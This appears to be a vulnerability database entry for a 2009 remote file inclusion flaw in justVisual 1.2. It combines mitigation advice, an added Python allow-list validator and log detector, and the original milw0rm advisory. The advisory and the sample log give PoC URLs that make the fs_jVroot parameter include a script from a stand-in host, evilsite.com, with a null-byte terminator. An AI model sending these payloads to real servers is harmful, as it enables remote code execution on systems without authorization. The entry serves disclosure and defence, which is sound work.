Vendor: justVisual
Author: SirGod
CVSS: 7.5 (HIGH)
CWE: 98 (Remote File Inclusion)
Product Name: justVisual
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: justVisual
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

justVisual 1.2 is vulnerable to Remote File Inclusion. The vulnerable code is present in multiple files, including index.php, contact.php, pageTemplate.php and utilities.php. An attacker can exploit this by supplying a remote URL in the fs_jVroot parameter, which the affected scripts include without validation.

Mitigation:

The fs_jVroot parameter should be validated before it is used, so that remote URLs are never passed to the include. The application should also restrict the parameter to a whitelist of allowed locations rather than accepting arbitrary values.
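As an added example (not justVisual's code and not part of the original entry), the following Python shows the allow-list check the mitigation calls for, applied to an fs_jVroot value, together with a detector that flags the advisory's request pattern in access-log lines. The allowed names, the Apache-style log lines and the client IPs are constructed for the example; the request paths and the parameter value follow the PoC URLs quoted below.

```python
"""Allow-list validation and access-log detection for the fs_jVroot RFI pattern.

Hypothetical example, not justVisual's own code. validate_fs_jvroot() mirrors
the fix the mitigation describes: the parameter is compared against a fixed
set of names and is never used as a path or URL. scan_access_log() is the
matching detection for a SOC, run over constructed log lines.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed allow-list: the site directories this deployment actually uses.
ALLOWED_ROOTS = frozenset({"site", "test"})

# A legitimate fs_jVroot is a bare directory name and nothing else.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Schemes and PHP stream wrappers that turn an include() into remote or
# attacker-controlled code when allow_url_include is on.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?|php|data|expect)://", re.IGNORECASE)


def validate_fs_jvroot(value, allowed=ALLOWED_ROOTS):
    """Return value if it is exactly one allow-listed name, otherwise None.

    URL schemes, slashes, traversal sequences and null bytes all fail the
    bare-name check, so they never reach the comparison against the list.
    """
    if value is None or not SAFE_NAME.fullmatch(value):
        return None
    return value if value in allowed else None


def rfi_indicators(value):
    """List the reasons a submitted fs_jVroot value looks like an RFI attempt."""
    reasons = []
    if REMOTE_SCHEME.match(value):
        reasons.append("remote scheme or stream wrapper")
    if "\x00" in value:
        reasons.append("null byte (truncates the appended path)")
    if ".." in value:
        reasons.append("path traversal")
    return reasons


# Apache combined/common log format: ip ident user [time] "method target proto" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Return one finding per request whose fs_jVroot value carries an RFI indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        target = urlsplit(m.group("target"))
        # parse_qs percent-decodes, so %00 becomes a real NUL byte here.
        for value in parse_qs(target.query, keep_blank_values=True).get("fs_jVroot", []):
            reasons = rfi_indicators(value)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": target.path,
                    "status": int(m.group("status")),
                    "reasons": reasons,
                })
    return findings


# Constructed sample log: one legitimate request, two requests shaped like the
# advisory's PoC URLs, and one request without the parameter at all.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jul/2009:12:00:01 +0000] "GET /justVisual/sites/site/pages/index.php?fs_jVroot=site HTTP/1.1" 200 2048',
    '198.51.100.7 - - [30/Jul/2009:12:00:09 +0000] "GET /justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00 HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/Jul/2009:12:00:10 +0000] "GET /justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00 HTTP/1.1" 200 512',
    '192.0.2.9 - - [30/Jul/2009:12:01:00 +0000] "GET /justVisual/index.php HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["path"], "; ".join(finding["reasons"]))
```

The validator deliberately matches a bare name rather than trying to strip schemes or decode the value, because a deny-list of bad prefixes is what null-byte and wrapper tricks are built to slip past. The detector decodes the query string the way the server would, so a %00 in the log is seen as the NUL byte it becomes; a status of 200 on a flagged request is the case worth triaging first, since it means the include did not fail outright.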
Source (Exploit-DB raw data):

##################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

 - Vulnerable code is everywhere

 - PoC's

   http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

##################################################################################################################

# milw0rm.com [2009-07-30]